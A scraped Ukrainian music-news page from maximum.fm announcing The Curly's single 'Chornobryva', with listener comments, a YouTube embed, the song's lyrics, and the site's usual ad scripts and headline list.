<p class="subtitle"><strong>Трек "Чорнобрива" – це другий сингл в кар'єрі молодого виконавця The Curly, нового підписанта лейбу Black Beats. Слухайте і ви нову цікаву музичну роботу!</strong></p>
<style>
    @media (max-width: 640px) {
        #mobileBrandingPlace {
            padding-bottom: 56.21%;
            z-index: 9;
            margin: 10px 0;
            order: -2;
        }
        #mobileBranding {
            margin: 0 !important;
        }
    }
</style>
<div class="mobileBrandingPlace" id="mobileBrandingPlace"></div>
<body><p>Прем'єра треку "Чорнобрива від виконавця The Curly відбулася 30 вересня 2022 року на YouTube. За кілька днів ця пісня вже зібрала понад 10 000 прослуховувань, лайки та схвальні коментарі від слухачів. До слова, юний музикант співпрацює з Black Beats.</p>
<p class="read-also">І ще: <a data-url="https://maximum.fm/dosi-lyublyu-max-barskih-ta-dasha-suvorova-zapisali-spilnu-pisnyu-pro-lviv_n206306" class="ajaxLink" href="https://maximum.fm/dosi-lyublyu-max-barskih-ta-dasha-suvorova-zapisali-spilnu-pisnyu-pro-lviv_n206306">"Досі люблю": Max Barskih та Даша Суворова записали спільну пісню про Львів</a></p>
<p>Молодий виконавець отримав такі позитивні коментарі: "Занадто короткий трек, як для прекрасного", "Ех, зараз би залетіти в клуб під цей трек, познайомитись з гарною дівчиною і ніколи не розлучатися з нею", "Кайф, хочеться ще більше контенту від тебе", "Це просто пожежа! Як пісня цього треку заснути?" тощо.</p>
<p><em><strong>Слухати пісню The Curly – Чорнобрива:</strong></em></p>
<section class="media_embed" data-base64-html="PGlmcmFtZSBhbGxvdz0iYWNjZWxlcm9tZXRlcjsgYXV0b3BsYXk7IGNsaXBib2FyZC13cml0ZTsgZW5jcnlwdGVkLW1lZGlhOyBneXJvc2NvcGU7IHBpY3R1cmUtaW4tcGljdHVyZSIgYWxsb3dmdWxsc2NyZWVuPSIiIGZyYW1lYm9yZGVyPSIwIiBoZWlnaHQ9IjM2MCIgc3JjPSJodHRwczovL3d3dy55b3V0dWJlLmNvbS9lbWJlZC9Bb1VNTzZwZ2Vraz9lbmFibGVqc2FwaT0xJmFtcDtvcmlnaW49aHR0cHM6Ly9tYXhpbXVtLmZtIiB0aXRsZT0iVGhlIEN1cmx5IC0g0KfQvtGA0L3QvtCx0YDQuNCy0LAgKNCf0YDQtdC8J9GU0YDQsCwgMjAyMikiIHdpZHRoPSI2NDAiPjwvaWZyYW1lPg=="><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/AoUMO6pgekk?enablejsapi=1&amp;origin=https://maximum.fm" title="The Curly - Чорнобрива (Прем'єра, 2022)" width="640"></iframe></section>
<p><strong><em>Слова пісні The Curly – Чорнобрива:</em></strong></p>
<p>I have 18 reasons to hate you<br>
Я скажу тобі слова, що –<br>
"останній поцілунок мені скрасить життя"</p>
<p>Every time I fall in love<br>
It’s f*cking breaking my heart </p>
<p>Чорнобрива, мила, <br>
скажи мені як звуть тебе <br>
О чарівна чарівна, <br>
ну скажи мені як звуть тебе </p>
<p>But I see you have some different preferences <br>
I wanna be in love with you, but I’m so scare <br>
І я тобі скажу ти така гарна, наче ясний день </p>
<p>I Feel like I am alive. <br>
I am alive when you looking in my eyes </p>
<p>Чорнобрива, мила, <br>
скажи мені як звуть тебе <br>
О чарівна чарівна, <br>
ну скажи мені як звуть тебе </p>
<p>And I wanna be inside your mind<br>
Слухай, everything all right <br>
Я лиш хочу чути тебе, <br>
але сильно не зважай <br>
And I wanna wake up <br>
and talk about nothing every day <br>
І я тобі кажу, що ти нестерпно мила <br>
і ти варта всіх пісень</p>
<p>Чорнобрива, мила, <br>
скажи мені як звуть тебе <br>
О чарівна чарівна,<br>
ну скажи мені як звуть тебе</p>
<p class="read-also">До теми: <a data-url="https://maximum.fm/viye-sirena-a-vsi-jdut-na-shchekavicyu-jerry-heil-perespivala-hit-olega-vinnika_n206289" class="ajaxLink" href="https://maximum.fm/viye-sirena-a-vsi-jdut-na-shchekavicyu-jerry-heil-perespivala-hit-olega-vinnika_n206289">"Виє сирена, а всі йдуть на Щекавицю": Jerry Heil переспівала хіт Олега Винника</a></p><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"755a48f4e8339c46","token":"cbfb020a8bb54073809b60aff8bcd962","version":"2022.8.1","si":100}' crossorigin="anonymous"></script>
</body>
<div class="add-scrollNews"></div>
<div class="hide-mobile-adv"></div>
<div class="follow-us-under-news">Читай максимум цікавих новин у
<a href="https://invite.viber.com/?g2=AQAKD4%2BB%2BNY530jWU5ccjyV3AZcJqO4yEMBH%2BHIFofGeS1%2F9tkreWHPw%2BiWAo2Hf&lang=uk" target="_blank">Viber</a>
</div>
<ul class="tags">
<li>Теги:</li>
<li>
<a class="ajaxLink" data-url="/shou-biz_t22786" title="" href="/shou-biz_t22786">Шоу-біз</a>
</li>
<li>
<a class="ajaxLink" data-url="/muzika_t22828" title="" href="/muzika_t22828">Музика</a>
</li>
<li>
<a class="ajaxLink" data-url="/ukrayinska-muzika_t23685" title="" href="/ukrayinska-muzika_t23685">Українська музика</a>
</li>
<li>
<a class="ajaxLink" data-url="/muzichni-novinki_t23831" title="" href="/muzichni-novinki_t23831">Музичні новинки</a>
</li>
</ul>
</div>
</div>
<hr>
<script>
        if (adCore.isSmallerThan(640)) {
            $('.fucked-desktop-adv').remove();
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_promoArticle',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1513328055277-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    dfpAdSlots['promoArticle'] = e.slot;
                    if (!e.isEmpty) {
                        document.getElementById('newsListPromoArticle').style.display = 'block';
                    } else {
                        console.log('Empty Promo')
                    }
                }
            });
        }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-mobile-adv">
<div id='div-gpt-ad-1513328055277-0'>
<script type='text/javascript'>
            if (adCore.isSmallerThan(640)) {
                googletag.cmd.push(function () {
                    googletag.display('div-gpt-ad-1513328055277-0');
                });
            }
        </script>
</div>
</div>
<div class="partner-recomendation">
<hr>
<div class="title">
<span class="replace-h3">пропозиції партнерів</span>
</div>
</div>

<script>
    function initPartnerRecommendation (){
        var node = document.createElement("div");
        node.style.textAlign = '-webkit-center';
        node.innerHTML = "<div id='div-gpt-ad-1619016064260-0'></div><div id='div-gpt-ad-1619016119630-0'></div>";
        var summary = document.querySelector(".partner-recomendation");
        summary.after(node);
        var slotId;
        var slotSize;
        var wrapperId;
        if (window.innerWidth < 640) {
            slotId = '/56301415/maximum_mobile_afterNews';
            slotSize = [300, 250];
            wrapperId = 'div-gpt-ad-1619016064260-0';
        } else {
            slotId = '/56301415/maximum_afterNews';
            slotSize = [[1, 1], [600, 300]];
            wrapperId = 'div-gpt-ad-1619016119630-0';
        }
        adCore.defineDfpSlot({
            'name': slotId,
            'sizes': slotSize,
            'id': wrapperId,
            'targeting': [
                ['pageType', adCore.getPageName()],
                                ['newsId', '206316'],
                ['tagId', 'Шоу-біз,Музика,Українська музика,Відео,Музичні новинки,Новини'],
                            ],
            'callback': function (e) {
                if(e.isEmpty){
                    console.log('EMPTY DFP afterNews')
                    var dfpDiv = document.getElementById(wrapperId);
                    summary.style.display = 'none';
                    dfpDiv.style.display = 'none';
                }
            }
        });

        var wrapperNode = document.getElementById(wrapperId);
        if (window.innerWidth < 640) {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
            wrapperNode.setAttribute('style', 'width: 300px; height: 250px;');
            summary.style.textAlign = '-webkit-center';
        } else {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
        }
    }

observer(".follow-us-under-news", initPartnerRecommendation)

</script>

</div>
<div id="load-news-container"></div>
</div>
<div class="columns show-for-large large-4">
<div id="radio24_300x100" style="display: none">
<script>
        if(adCore.isLargerThan(1024)) {
            adCore.defineDfpSlot({
                'name': '/113579682/radio24_300x100',
                'sizes': [300, 100],
                'id': 'div-gpt-ad-1473750613519-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if(!e.isEmpty){
                        document.getElementById('radio24_300x100').style.display = 'block';
                    } else {
                        console.log('Empty radio24_300x100')
                    }
                }
            });
        }
</script>
<div class="mobile-300-reklama">
<div id='div-gpt-ad-1473750613519-0'>
<script type='text/javascript'>
                if (adCore.isLargerThan(1024)) {
                    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1473750613519-0'); });
                }
        </script>
</div>
</div> </div>
<script>
    if (adCore.isLargerThan(1024)) {
        $('.fucked-mobile-adv').remove();
        adCore.defineDfpSlot({
            'name': '/56301415/maximum_right_column_informer',
            'sizes': [300, 250],
            'id': 'div-gpt-ad-1659515946920-0',
            'targeting': adCore.targeting.getAll(),
            'refreshEventName': 'historyChange',
            'callback': function (e) {
                dfpAdSlots['promoArticle'] = e.slot;
                if (!e.isEmpty) {
                    document.getElementById('newsListPromoArticle').style.display = 'block';
                } else {
                    console.log("EMPTY DESKTOP rightColumnInformer")
                }
            }
        });
    }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-desktop-adv">
<div id='div-gpt-ad-1659515946920-0'>
<script type='text/javascript'>
            if (adCore.isLargerThan(1024)) {
                googletag.cmd.push(function () {
                    googletag.display('div-gpt-ad-1659515946920-0');
                });
            }
        </script>
</div>
</div>
<div style="margin-top: 20px;" id="radio24_300x250_top">

<div id="M378454ScriptRootC662077">
<div id="M378454PreloadC662077"></div>
<script>
            var D = new Date(), d = document, b = 'body', ce = 'createElement', ac = 'appendChild', st = 'style',
                ds = 'display', n = 'none', gi = 'getElementById', lp = d.location.protocol,
                wp = lp.indexOf('http') == 0 ? lp : 'https:';
            var i = d[ce]('iframe');
            i[st][ds] = n;
            d[gi]("M378454ScriptRootC662077")[ac](i);
            try {
                var iw = i.contentWindow.document;
                iw.open();
                iw.writeln("<ht" + "ml><bo" + "dy></bo" + "dy></ht" + "ml>");
                iw.close();
                var c = iw[b];
            } catch (e) {
                var iw = d;
                var c = d[gi]("M378454ScriptRootC662077");
            }
            var dv = iw[ce]('div');
            dv.id = "MG_ID";
            dv[st][ds] = n;
            dv.innerHTML = 662077;
            c[ac](dv);
            var s = iw[ce]('script');
            s.async = 'async';
            s.defer = 'defer';
            s.charset = 'utf-8';
            s.src = wp + "//jsc.marketgid.com/1/m/1.maximum.fm.662077.js?t=" + D.getYear() + D.getMonth() + D.getUTCDate() + D.getUTCHours();
            c[ac](s);
    </script>
</div>  </div>
<div class="news-list-wrapper" id="news-list-wrapper" data-main="0">
<script data-cfasync="false">
    if (window.innerWidth < 640) {
        const removeElements = (elms) => elms.forEach(el => el.remove());
        removeElements(document.querySelectorAll('.news-list-wrapper'));
    }
</script>
<span class="replace-h3"><a class="ajaxLink" data-url="/novini_t2" title="novina" href="/novini_t2">Новини</a></span>
<ul class="tabs sort-list " data-tabs id="news-list-tabs">
<li data-height-set="false" id="top-list-li" class="tabs-title"><a href="#top-list">Головні</a></li>
<li class="tabs-title is-active"><a href="#last-list" aria-selected="true">Останні</a></li>
</ul>
<div class="tabs-content" data-tabs-content="news-list-tabs">
<div class="tabs-panel is-active" id="last-list">
<button id="last-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="last-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list news-list-last-ul" id="ph" style="top:0">
<li class="month">
05 жовтня
</li>
<li data-published-date="2022-10-05 20:55:00" title="" class="  photo  ">
<a target="_self" data-url="/klopotenko-rozpoviv-yak-prigotuvati-makaroni-z-garbuzom-recept-originalnoyi-pasti_n206312" class="ajaxLink" href="/klopotenko-rozpoviv-yak-prigotuvati-makaroni-z-garbuzom-recept-originalnoyi-pasti_n206312">
<div class="time">20:55</div>
<div class="news-title">
Клопотенко розповів, як приготувати макарони з гарбузом: рецепт оригінальної пасти
</div>
</a>
</li>
<li data-published-date="2022-10-05 20:25:00" title="" class="  video  ">
<a target="_self" data-url="/fiinka-bij-sluhajte-pisnyu-pro-te-shcho-treba-robiti-z-vorogom_n206315" class="ajaxLink" href="/fiinka-bij-sluhajte-pisnyu-pro-te-shcho-treba-robiti-z-vorogom_n206315">
<div class="time">20:25</div>
<div class="news-title">
FIINKA – &quot;Бий!&quot;: слухайте пісню про те, що треба робити з ворогом
</div>
</a>
</li>
<li data-published-date="2022-10-05 19:52:00" title="" class="  photo with-photo important  ">
<a target="_self" data-url="/yak-doglyadati-za-vzuttyam-osinnyu-5-universalnih-pravil_n169467" class="ajaxLink" href="/yak-doglyadati-za-vzuttyam-osinnyu-5-universalnih-pravil_n169467">
<div class="time">19:52</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2019/11/5dcd7cfadba05015942369.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=57" data-sizes="auto" class="lazyload " style="" alt="">
<noscript>
    </noscript>
</span>
Як доглядати за взуттям осінню: 5 універсальних правил
</div>
</a>
</li>
<li data-published-date="2022-10-05 19:23:00" title="" class="  video important  ">
<a target="_self" data-url="/cheev-mriyeshsya-merezhu-pidkoryuye-nova-pisnya-vid-avtora-hita-garno-tak_n206313" class="ajaxLink" href="/cheev-mriyeshsya-merezhu-pidkoryuye-nova-pisnya-vid-avtora-hita-garno-tak_n206313">
<div class="time">19:23</div>
<div class="news-title">
CHEEV – &quot;Мрієшся&quot;: мережу підкорює нова пісня від автора хіта &quot;Гарно так&quot;
</div>
</a>
</li>

<li data-published-date="2022-10-05 18:51:00" title="" class="  important  ">
<a target="_self" data-url="/4-poradi-yaki-dopomozhut-shudnuti-za-dopomogoyu-hodbi_n192131" class="ajaxLink" href="/4-poradi-yaki-dopomozhut-shudnuti-za-dopomogoyu-hodbi_n192131">
<div class="time">18:51</div>
<div class="news-title">
4 поради, які допоможуть схуднути за допомогою ходьби
</div>
</a>
</li>
<li data-published-date="" title="" class="with-large-photo  video important  ">
<a target="_self" data-url="/ukrayinski-patriotichni-pisni-plejlist-yakij-pidijmaye-duh_n202423" class="ajaxLink" href="/ukrayinski-patriotichni-pisni-plejlist-yakij-pidijmaye-duh_n202423">
<div class="time"></div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/03/6230b8ac93e32907817273.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=57" data-sizes="auto" class="lazyload " style="" alt="Українська патріотична музика">
<noscript>
    </noscript>
</span>
Українські патріотичні пісні: плейлист, який підіймає дух
</div>
</a>
</li>
<li data-published-date="2022-10-05 18:21:00" title="" class="  video  ">
<a target="_self" data-url="/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" class="ajaxLink" href="/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316">
 <div class="time">18:21</div>
<div class="news-title">
&quot;Чорнобрива&quot;: слухайте крутий трек від юного виконавця The Curly
</div>
</a>
</li>
<li data-published-date="2022-10-05 17:54:00" title="" class="   ">
<a target="_self" data-url="/nazvana-optimalna-shvidkist-avto-dlya-minimalnoyi-vitrati-paliva_n198224" class="ajaxLink" href="/nazvana-optimalna-shvidkist-avto-dlya-minimalnoyi-vitrati-paliva_n198224">
<div class="time">17:54</div>
<div class="news-title">
Названа оптимальна швидкість авто для мінімальної витрати палива
</div>
</a>
</li>
<li data-published-date="2022-10-05 17:22:00" title="" class="  video  ">
<a target="_self" data-url="/roxolana-prezentuvala-pisnyu-im-gone-vid-imeni-ditej-yakih-vbili-rosijski-okupanti_n206318" class="ajaxLink" href="/roxolana-prezentuvala-pisnyu-im-gone-vid-imeni-ditej-yakih-vbili-rosijski-okupanti_n206318">
<div class="time">17:22</div>
<div class="news-title">
ROXOLANA презентувала пісню &quot;I&#039;m Gone&quot; від імені дітей, яких вбили російські окупанти
</div>
</a>
</li>
<li data-published-date="2022-10-05 16:52:00" title="" class="  photo important  ">
<a target="_self" data-url="/osinnya-pogoda-yak-odyagatisya-pri-temperaturi-15-gradusiv-shchob-bulo-komfortno_n184203" class="ajaxLink" href="/osinnya-pogoda-yak-odyagatisya-pri-temperaturi-15-gradusiv-shchob-bulo-komfortno_n184203">
<div class="time">16:52</div>
<div class="news-title">
Осіння погода: як одягатися при температурі +15 градусів, щоб було комфортно
</div>
</a>
</li>
<li data-published-date="2022-10-05 16:24:00" title="" class="  with-photo video  ">
<a target="_self" data-url="/lesya-sluhajte-novu-pisnyu-krut-na-slova-poeziyi-lesi-ukrayinki_n206314" class="ajaxLink" href="/lesya-sluhajte-novu-pisnyu-krut-na-slova-poeziyi-lesi-ukrayinki_n206314">
<div class="time">16:24</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/10/633d55d47ed11958499966.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=57" data-sizes="auto" class="lazyload " style="" alt="">
<noscript>
    </noscript>
</span>
&quot;Леся&quot;: слухайте нову пісню KRUTЬ на слова поезії Лесі Українки
</div>
</a>
</li>
<li data-published-date="2022-10-05 15:51:00" title="" class="  video  ">
<a target="_self" data-url="/ektor-himenes-bravo-prigotuvav-papa-al-pomidoro-recept-originalnogo-supu-vid-shef-kuharya_n206311" class="ajaxLink" href="/ektor-himenes-bravo-prigotuvav-papa-al-pomidoro-recept-originalnogo-supu-vid-shef-kuharya_n206311">
<div class="time">15:51</div>
<div class="news-title">
Ектор Хіменес-Браво приготував папа аль помідоро: рецепт оригінального супу від шеф-кухаря
</div>
 </a>
</li>
<li data-published-date="2022-10-05 15:25:00" title="" class="  important  ">
<a target="_self" data-url="/sezon-doshchiv-ta-lyubovi-ci-znaki-zodiaku-porinut-v-kohannya-voseni_n206322" class="ajaxLink" href="/sezon-doshchiv-ta-lyubovi-ci-znaki-zodiaku-porinut-v-kohannya-voseni_n206322">
<div class="time">15:25</div>
<div class="news-title">
Сезон дощів та любові: ці знаки Зодіаку поринуть в кохання восени
</div>
</a>
</li>
<li data-published-date="2022-10-05 14:54:00" title="" class="  important  ">
<a target="_self" data-url="/6-zhovtnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206310" class="ajaxLink" href="/6-zhovtnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206310">
<div class="time">14:54</div>
<div class="news-title">
6 жовтня 2022 – яке сьогодні свято: традиції, заборони і прикмети
</div>
</a>
</li>
<li data-published-date="" title="" class="with-large-photo  photo video  ">
<a target="_self" data-url="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="ajaxLink" href="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
<div class="time"></div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2019/03/5c8a3a3175fc8135803913.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=57" data-sizes="auto" class="lazyload " style="" alt="З днем народження!">
<noscript>
    </noscript>
</span>
З Днем народження: ТОП 75 привітань у віршах, прозі та смс українською
</div>
</a>
</li>
<li data-published-date="2022-10-05 14:29:00" title="" class="   ">
<a target="_self" data-url="/ekspert-poyasniv-chomu-ne-varto-sushiti-odyag-na-batareyah_n206321" class="ajaxLink" href="/ekspert-poyasniv-chomu-ne-varto-sushiti-odyag-na-batareyah_n206321">
<div class="time">14:29</div>
<div class="news-title">
Експерт пояснив, чому не варто сушити одяг на батареях
</div>
</a>
</li>
<li data-published-date="2022-10-05 13:50:00" title="" class="  video  ">
<a target="_self" data-url="/nichni-salyuti-dlya-okupantiv-u-minoboroni-pokazali-efektne-video_n206213" class="ajaxLink" href="/nichni-salyuti-dlya-okupantiv-u-minoboroni-pokazali-efektne-video_n206213">
<div class="time">13:50</div>
<div class="news-title">
Нічні &quot;салюти&quot; для окупантів: у Міноборони показали ефектне відео
</div>
</a>
</li>
<li data-published-date="2022-10-05 13:32:23" title="" class="  photo  ">
<a target="_self" data-url="/rozkuta-demi-rouz-rozburhala-fanativ-novoyu-fotosesiyeyu-majzhe-bez-odyagu--18_n206320" class="ajaxLink" href="/rozkuta-demi-rouz-rozburhala-fanativ-novoyu-fotosesiyeyu-majzhe-bez-odyagu--18_n206320">
<div class="time">13:32</div>
<div class="news-title">
Розкута Демі Роуз розбурхала фанатів новою фотосесією майже без одягу – 18+
</div>
</a>
</li>
<li data-published-date="2022-10-05 12:32:00" title="" class="  with-photo  ">
<a target="_self" data-url="/pogoda-v-ukrayini-6-zhovtnya-sinoptik-potishila-teplim-prognozom_n206319" class="ajaxLink" href="/pogoda-v-ukrayini-6-zhovtnya-sinoptik-potishila-teplim-prognozom_n206319">
<div class="time">12:32</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/10/633d55fb93015373411660.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=57" data-sizes="auto" class="lazyload " style="" alt="Прогноз погоди на 6 жовтня 2022 в Україні">
<noscript>
    </noscript>
</span>
Погода в Україні 6 жовтня: синоптик потішила теплим прогнозом
</div>
</a>
</li>
<li data-published-date="2022-10-05 11:50:00" title="" class="   ">
<a target="_self" data-url="/yak-stres-naspravdi-vplivaye-na-stan-shkiri-vidpovid-ekspertiv_n206309" class="ajaxLink" href="/yak-stres-naspravdi-vplivaye-na-stan-shkiri-vidpovid-ekspertiv_n206309">
<div class="time">11:50</div>
<div class="news-title">
Як стрес насправді впливає на стан шкіри: відповідь експертів
</div>
</a>
</li>
<li data-published-date="2022-10-05 11:31:15" title="" class="  photo important  ">
<a target="_self" data-url="/vidpovid-masku-u-kiyevi-bilya-rozbitoyi-tehniki-rf-zyavilas-onovlena-tesla_n206308" class="ajaxLink" href="/vidpovid-masku-u-kiyevi-bilya-rozbitoyi-tehniki-rf-zyavilas-onovlena-tesla_n206308">
<div class="time">11:31</div>
<div class="news-title">
Відповідь Маску: у Києві біля розбитої техніки рф з&#039;явилась &quot;оновлена&quot; Tesla
</div>
</a>
</li>
<li data-published-date="2022-10-05 10:26:00" title="" class="   ">
<a target="_self" data-url="/chi-mozhna-zapivati-yizhu-vodoyu-eksperti-dali-vidpovid_n205833" class="ajaxLink" href="/chi-mozhna-zapivati-yizhu-vodoyu-eksperti-dali-vidpovid_n205833">
<div class="time">10:26</div>
<div class="news-title">
Чи можна запивати їжу водою: експерти дали відповідь
</div>
</a>
</li>
<li data-published-date="2022-10-05 09:22:00" title="" class="  photo  ">
<a target="_self" data-url="/viyavili-emodzi-yaki-zroblyat-vas-bilsh-chi-mensh-privablivim_n206098" class="ajaxLink" href="/viyavili-emodzi-yaki-zroblyat-vas-bilsh-chi-mensh-privablivim_n206098">
<div class="time">09:22</div>
<div class="news-title">
Виявили емодзі, які зроблять вас більш чи менш привабливим
</div>
</a>
</li>
<li data-published-date="2022-10-05 08:41:00" title="" class="  photo  ">
<a target="_self" data-url="/u-kozhnogo-ye-ulyublena-nezvichajni-ta-divni-chashki-z-domivok-po-vsomu-svitu_n205745" class="ajaxLink" href="/u-kozhnogo-ye-ulyublena-nezvichajni-ta-divni-chashki-z-domivok-po-vsomu-svitu_n205745">
<div class="time">08:41</div>
<div class="news-title">
У кожного є улюблена: незвичайні та дивні чашки з домівок по всьому світу
</div>
</a>
</li>
<li class="month">
04 жовтня
</li>
<li data-published-date="2022-10-04 20:50:00" title="" class="  with-photo last ">
<a target="_self" data-url="/oznaki-osinnogo-oslablennya-imunitetu-yaki-ne-mozhna-ignoruvati_n184807" class="ajaxLink" href="/oznaki-osinnogo-oslablennya-imunitetu-yaki-ne-mozhna-ignoruvati_n184807">
<div class="time">20:50</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2020/10/5f77317ee7a1e799413208.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=57" data-sizes="auto" class="lazyload " style="" alt="Застуда">
<noscript>
    </noscript>
</span>
Ознаки осіннього ослаблення імунітету, які не можна ігнорувати
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news last">Більше новин
</button>
</div>
<div class="tabs-panel" id="top-list">
<button data-scrolled-count="0" data-scrolled-li-index="0" id="important-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="important-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list-important-ul news-list" style="top:0">
<li class="month">
05 жовтня
</li>
<li data-published-date="2022-10-05 19:23:00" class=" video   ">
<a data-url="/cheev-mriyeshsya-merezhu-pidkoryuye-nova-pisnya-vid-avtora-hita-garno-tak_n206313" title="" class="ajaxLink" target="_self" href="/cheev-mriyeshsya-merezhu-pidkoryuye-nova-pisnya-vid-avtora-hita-garno-tak_n206313">
<div class="time">19:23</div>
<div class="news-title">
CHEEV – &quot;Мрієшся&quot;: мережу підкорює нова пісня від автора хіта &quot;Гарно так&quot;
</div>
</a>
</li>
<li data-published-date="2022-10-05 15:25:00" class="   ">
<a data-url="/sezon-doshchiv-ta-lyubovi-ci-znaki-zodiaku-porinut-v-kohannya-voseni_n206322" title="" class="ajaxLink" target="_self" href="/sezon-doshchiv-ta-lyubovi-ci-znaki-zodiaku-porinut-v-kohannya-voseni_n206322">
<div class="time">15:25</div>
<div class="news-title">
Сезон дощів та любові: ці знаки Зодіаку поринуть в кохання восени
</div>
</a>
</li>
<li data-published-date="2022-10-05 11:31:15" class=" photo   ">
<a data-url="/vidpovid-masku-u-kiyevi-bilya-rozbitoyi-tehniki-rf-zyavilas-onovlena-tesla_n206308" title="" class="ajaxLink" target="_self" href="/vidpovid-masku-u-kiyevi-bilya-rozbitoyi-tehniki-rf-zyavilas-onovlena-tesla_n206308">
 <div class="time">11:31</div>
<div class="news-title">
Відповідь Маску: у Києві біля розбитої техніки рф з&#039;явилась &quot;оновлена&quot; Tesla
</div>
</a>
</li>
<li class="month">
04 жовтня
</li>
<li data-published-date="2022-10-04 19:21:00" class=" video   ">
<a data-url="/dosi-lyublyu-max-barskih-ta-dasha-suvorova-zapisali-spilnu-pisnyu-pro-lviv_n206306" title="" class="ajaxLink" target="_self" href="/dosi-lyublyu-max-barskih-ta-dasha-suvorova-zapisali-spilnu-pisnyu-pro-lviv_n206306">
<div class="time">19:21</div>
<div class="news-title">
&quot;Досі люблю&quot;: Max Barskih та Даша Суворова записали спільну пісню про Львів
</div>
</a>
</li>
<li data-published-date="2022-10-04 15:25:00" class="   ">
<a data-url="/ya-pochuvavsya-bezporadnim-i-vinnim-shevchenko-vidverto-napisav-pro-vijnu-v-ukrayini_n206299" title="" class="ajaxLink" target="_self" href="/ya-pochuvavsya-bezporadnim-i-vinnim-shevchenko-vidverto-napisav-pro-vijnu-v-ukrayini_n206299">
<div class="time">15:25</div>
<div class="news-title">
&quot;Я почувався безпорадним і винним&quot;: Шевченко відверто написав про війну в Україні
</div>
</a>
</li>
<li data-published-date="2022-10-04 11:39:00" class=" video   ">
<a data-url="/vidchuvayesh-shcho-perebuvayesh-v-okupaciyi-oleksandr-pro-zhittya-v-krimu-ta-sut-rosiyi_n206292" title="" class="ajaxLink" target="_self" href="/vidchuvayesh-shcho-perebuvayesh-v-okupaciyi-oleksandr-pro-zhittya-v-krimu-ta-sut-rosiyi_n206292">
<div class="time">11:39</div>
<div class="news-title">
&quot;Відчуваєш, що перебуваєш в окупації&quot;: Олександр про життя в Криму та суть росії
</div>
</a>
</li>
<li class="month">
03 жовтня
</li>
<li data-published-date="2022-10-03 18:52:00" class=" video   ">
<a data-url="/istoriya-gucula-thutsuls-prezentuyut-svij-tretij-singl-sum-vivchara_n206285" title="" class="ajaxLink" target="_self" href="/istoriya-gucula-thutsuls-prezentuyut-svij-tretij-singl-sum-vivchara_n206285">
<div class="time">18:52</div>
<div class="news-title">
Історія гуцула: T.HUTSULS презентують свій третій сингл &quot;Сум вівчара&quot;
</div>
</a>
</li>
<li data-published-date="2022-10-03 15:55:00" class="   ">
<a data-url="/goroskop-na-cej-tizhden-3-9-zhovtnya-2022-prognoz-dlya-vsih-znakiv-zodiaku_n206288" title="" class="ajaxLink" target="_self" href="/goroskop-na-cej-tizhden-3-9-zhovtnya-2022-prognoz-dlya-vsih-znakiv-zodiaku_n206288">
<div class="time">15:55</div>
<div class="news-title">
Гороскоп на цей тиждень 3 – 9 жовтня 2022: прогноз для всіх знаків Зодіаку
</div>
</a>
</li>
<li data-published-date="2022-10-03 11:56:06" class="   ">
<a data-url="/yakim-znakam-zodiaku-sogodni-varto-poprositi-vibachennya-za-obrazi_n206287" title="" class="ajaxLink" target="_self" href="/yakim-znakam-zodiaku-sogodni-varto-poprositi-vibachennya-za-obrazi_n206287">
<div class="time">11:56</div>
<div class="news-title">
Яким знакам Зодіаку сьогодні варто попросити вибачення за образи
</div>
</a>
</li>
<li class="month">
02 жовтня
</li>
<li data-published-date="2022-10-02 19:31:00" class=" video   ">
